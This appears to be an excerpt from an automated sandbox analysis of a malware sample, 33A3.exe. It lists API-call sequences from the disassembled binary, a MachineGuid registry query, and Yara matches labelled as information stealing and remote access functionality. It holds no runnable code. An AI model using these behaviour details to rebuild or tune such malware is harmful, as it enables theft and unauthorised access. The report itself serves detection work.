Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: EnumSystemLocalesW, 9_2_004387C8
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: GetLocaleInfoW, 9_2_0043884E
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free, 9_2_00432B6D
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free, 9_2_00432FAD
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 9_2_004335E7
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW, 9_2_00437BB3
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: EnumSystemLocalesW, 9_2_00437E27
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 9_2_00437E83
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 9_2_00437F00
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free, 9_2_0042BF17
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage, 9_2_00437F83
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 13_2_04A73F87
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson, 13_2_04A6C8B7
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free, 13_2_04A749EA
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free, 13_2_04A7394D
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 13_2_04A80AB6
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free, 14_2_0043404A
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage, 14_2_00438178
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 14_2_00440116
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 14_2_004382A2
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: GetLocaleInfoW,_GetPrimaryLen, 14_2_0043834F
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s, 14_2_00438423
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: EnumSystemLocalesW, 14_2_004387C8
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: GetLocaleInfoW, 14_2_0043884E
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free, 14_2_00432B6D
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free, 14_2_00432FAD
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 14_2_004335E7
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW, 14_2_00437BB3
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: EnumSystemLocalesW, 14_2_00437E27
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 14_2_00437E83
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 14_2_00437F00
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free, 14_2_0042BF17
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage, 14_2_00437F83
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 8_2_00409292 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 8_2_00409292
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 9_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle, 9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 9_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 9_2_0042FE47
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: explorer.exe, 0000001E.00000002.3273089936.000000000C029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3082332042.000000000C084000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3097253070.000000000C081000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3091807720.000000000C081000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3080057918.000000000C084000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3096887888.000000000C029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3122156074.000000000C081000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3103821447.000000000C084000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3075737405.000000000C081000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3122022026.000000000C029000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Windows Defender\MSASCui.exe

Stealing of Sensitive Information

Source: Yara match File source: 00000004.00000002.2342373288.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2342416415.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2068350928.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.3280589230.000000000CAC1000.00000020.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2068279346.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: 00000004.00000002.2342373288.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2342416415.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2068350928.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.3280589230.000000000CAC1000.00000020.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2068279346.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY